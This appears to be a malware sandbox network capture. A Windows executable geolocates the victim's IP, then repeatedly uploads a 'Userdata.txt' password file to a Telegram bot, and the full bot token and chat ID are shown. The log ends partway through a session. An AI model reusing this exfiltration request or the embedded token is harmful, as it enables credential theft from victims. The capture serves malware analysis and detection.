                                                                                                          2025-01-10 22:11:51 UTC1390INData Raw: a6 22 9b 43 81 b8 ad 68 74 c7 d3 54 aa da 87 0d 6b ec 1c 06 4d 29 22 ac 9c a7 32 80 9e 57 b1 3e 65 af 06 70 b0 e2 4b 36 51 c1 8e 97 46 71 d3 2f 0e aa e8 17 cf 25 53 00 3c 2a e2 35 1c b7 3d 01 a4 3d 88 a6 0c 11 8c 64 8d c1 55 d3 75 c9 5a 20 c2 8a 22 f7 42 43 b5 7f ba 9d 7b 5e 8a cb 5b b3 ab ef 05 2c 1f ea 06 57 2e 77 7e f1 02 f2 7c da dd 54 aa a8 be 78 f0 79 fa 25 17 c9 20 88 3d a6 de 03 18 b1 41 0e ff 37 a3 4a a5 27 39 9b 2b 76 09 ad 93 35 65 12 a1 9e fc 0e 40 97 fb ce b8 6f 58 c9 7d cf 03 7f 5f 6f ee 3b 80 d1 76 98 10 7a 95 b5 37 43 d0 a7 d2 a4 c6 62 10 63 7e 0a 7d 8c f2 83 10 71 d8 2b 59 c3 3a 57 70 49 68 c6 85 e8 bf 0f 7b 48 ba 52 85 03 e7 94 06 21 3f 28 1f fe 7e ef 37 f4 2f 9f d0 34 8d 03 2d d7 08 1a c0 05 0c 4d 93 51 b0 dc e6 88 a9 59 85 00 a4 0f be
                                                                                                          Data Ascii: "ChtTkM)"2W>epK6QFq/%S<*5==dUuZ "BC{^[,W.w~|Txy% =A7J'9+v5e@oX}_o;vz7Cbc~}q+Y:WpIh{HR!?(~7/4-MQY


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.9 | 49976       | 104.21.96.1    | 443              | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-10 22:11:53 UTC | 85                | OUT       | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
2025-01-10 22:11:53 UTC | 857               | IN        | HTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 22:11:53 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1861902
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTim8cgfDpt%2FuKJuoSOvPX9MULVbcez9KBFB3JBmVNvnWVyUyHPLdZ%2BQd104wcy0kYQjQ5fOxdO%2BUk7Vzjm0Jf2yN9nwNdsk6izokT8zQ66c9NFYGOmPV6zdP9EGE8%2BmRiqriqPh"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 900001645e3b4363-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1583&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1779402&cwnd=240&unsent_bytes=0&cid=996d0e15d4cc6d30&ts=168&x=0"
2025-01-10 22:11:53 UTC | 362               | IN        | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
3          | 192.168.2.9 | 49977       | 149.154.167.220 | 443              | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-10 22:12:00 UTC | 294               | OUT       | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3199e441f6db
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
2025-01-10 22:12:00 UTC | 1090              | OUT       | Data Ascii: --===============8dd3199e441f6dbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:00 UTC | 388               | IN        | HTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:00 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:00 UTC | 534               | IN        | Data Ascii: {"ok":true,"result":{"message_id":44785,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547120,"document":{"file_name":"U


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
4          | 192.168.2.9 | 49979       | 149.154.167.220 | 443              | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-10 22:12:01 UTC | 294               | OUT       | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31b0368823d7
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
2025-01-10 22:12:01 UTC | 1090              | OUT       | Data Ascii: --===============8dd31b0368823d7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:02 UTC | 388               | IN        | HTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:01 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:02 UTC | 534               | IN        | Data Ascii: {"ok":true,"result":{"message_id":44786,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547121,"document":{"file_name":"U


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
5          | 192.168.2.9 | 49981       | 149.154.167.220 | 443              | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-10 22:12:03 UTC | 270               | OUT       | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31c24cf1dd08
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
2025-01-10 22:12:03 UTC | 1090              | OUT       | Data Ascii: --===============8dd31c24cf1dd08Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:03 UTC | 388               | IN        | HTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:03 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:03 UTC | 534               | IN        | Data Ascii: {"ok":true,"result":{"message_id":44787,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547123,"document":{"file_name":"U


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
6          | 192.168.2.9 | 49983       | 149.154.167.220 | 443              | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-10 22:12:04 UTC | 270               | OUT       | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31d456c3dc56
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
2025-01-10 22:12:04 UTC | 1090              | OUT       | Data Ascii: --===============8dd31d456c3dc56Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:05 UTC | 388               | IN        | HTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:05 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:05 UTC | 534               | IN        | Data Ascii: {"ok":true,"result":{"message_id":44788,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547125,"document":{"file_name":"U


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
7          | 192.168.2.9 | 49985       | 149.154.167.220 | 443              | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp               | Bytes transferred | Direction | Data
2025-01-10 22:12:06 UTC | 294               | OUT       | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31e7b6fffa58
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
2025-01-10 22:12:06 UTC | 1090              | OUT       | Data Ascii: --===============8dd31e7b6fffa58Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:06 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:06 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:06 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44789,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547126,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49987 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:08 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd31f9a7e3cc8b
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 39 61 37 65 33 63 63 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31f9a7e3cc8bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:08 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:08 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:08 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44790,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547128,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49989 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:09 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd320b8d01f7ea
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:09 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 62 38 64 30 31 66 37 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd320b8d01f7eaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:09 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:09 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:09 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44791,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547129,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49992 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:11 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd3220243286cd
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 30 32 34 33 32 38 36 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3220243286cdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:11 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:11 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:11 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44792,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547131,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49994 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:12 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd32334eab1922
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 33 34 65 61 62 31 39 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32334eab1922Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:13 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 22:12:13 GMT
Content-Type: application/json
Content-Length: 534
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:13 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44793,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547133,"document":{"file_name":"U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49996 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:14 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd3247c90beef3
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
